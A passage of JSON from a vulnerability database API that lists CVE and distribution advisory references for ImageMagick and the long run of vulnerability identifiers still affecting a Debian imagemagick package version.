"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793177", "reference_id": "1793177", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793177" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947308", "reference_id": "947308", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947308" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4549-1/", "reference_id": "USN-4549-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4549-1/" }, { "reference_url": "https://usn.ubuntu.com/4670-1/", "reference_id": "USN-4670-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4670-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": 